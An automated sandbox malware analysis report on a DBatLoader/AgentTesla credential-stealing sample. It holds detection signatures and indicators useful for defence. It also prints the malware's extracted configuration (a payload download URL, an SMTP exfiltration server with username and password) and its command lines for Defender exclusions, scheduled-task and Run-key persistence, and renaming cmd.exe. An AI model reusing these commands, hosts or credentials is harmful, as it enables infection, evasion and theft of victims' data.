Windows Analysis Report
x.exe

Overview

General Information

Sample name: x.exe
Analysis ID: 1554496
MD5: 31bc6907d6097a76bb1dd891cfc09b7a
SHA1: 97340ca203a1207e492135d580c6860a724a227f
SHA256: f711703c8ba66dcedb8e4b83f21a0425c528e278242c852fd5cf54bb43e30454
Tags: exe, user-JAMESWT_MHT

Detection

AgentTesla, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • x.exe (PID: 6332 cmdline: "C:\Users\user\Desktop\x.exe" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)
    • cmd.exe (PID: 3380 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 5032 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • esentutl.exe (PID: 4864 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lxsyrsiW.pif (PID: 2104 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 3796 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 2532 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
        • powershell.exe (PID: 3132 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 2828 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 5168 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • TrojanAIbot.exe (PID: 5388 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
        • cmd.exe (PID: 1268 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 3660 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • TrojanAIbot.exe (PID: 6628 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 5032 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)
    • lxsyrsiW.pif (PID: 4208 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 2968 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 1268 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 4948 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)
    • lxsyrsiW.pif (PID: 3088 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 6408 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 3820 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware configuration (DBatLoader): {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Malware configuration (AgentTesla): {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
Yara matches (dropped files)

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\neworigin.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
C:\Users\user\AppData\Local\Temp\neworigin.exe | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
C:\Users\user\AppData\Local\Temp\neworigin.exe | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | see below
  • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Yara matches (memory dumps)

Source | Rule | Description | Author | Strings
00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
(15 entries in total; the remaining rows are not included in this extract)

Yara matches (unpacked PEs)

Source | Rule | Description | Author | Strings
9.0.neworigin.exe.840000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
9.0.neworigin.exe.840000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
9.0.neworigin.exe.840000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | see below
  • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.x.exe.2ec0000.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | -

System Summary

                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\x.exe, ProcessId: 6332, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\Desktop\x.exe", ParentImage: C:\Users\user\Desktop\x.exe, ParentProcessId: 6332, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 2104, ProcessName: lxsyrsiW.pif
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x.exe, ProcessId: 6332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3132, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x.exe, ProcessId: 6332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\Desktop\x.exe", ParentImage: C:\Users\user\Desktop\x.exe, ParentProcessId: 6332, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 2104, ProcessName: lxsyrsiW.pif
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3132, ProcessName: powershell.exe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 2532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5168, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 3796, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49714
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5168, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3132, ProcessName: powershell.exe
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-12T15:55:20.344502+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.6 | 49721 | TCP
2024-11-12T15:55:58.715306+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.6 | 49888 | TCP
2024-11-12T15:55:02.088938+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49710 | 198.252.105.91 | 443 | TCP

AV Detection

                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: x.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
                      Source: 9.0.neworigin.exe.840000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFReversingLabs: Detection: 28%
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeReversingLabs: Detection: 65%
                      Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                      Source: x.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49781 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2187757870.0000000028410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C47000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.2166700706.00000000058F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2170510348.0000000021E90000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111145235.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2170510348.0000000021EBF000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2200179187.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C47000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.2166700706.00000000058F0000.00000004.00001000.00020000.00000000.sdmp

Spreading

                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02EC5908
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 013B7394h10_2_013B7108
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 013B78DCh10_2_013B767A
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_013B7E60
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_013B7E54
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 4x nop then jmp 0549BCBDh16_2_0549BA40

Networking

                      Source: Malware configuration extractorURLs: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDE4B8 InternetCheckConnectionA,0_2_02EDE4B8
                      Source: global trafficTCP traffic: 192.168.2.6:49714 -> 51.195.88.199:587
                      Source: Joe Sandbox ViewIP Address: 198.252.105.91 198.252.105.91
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
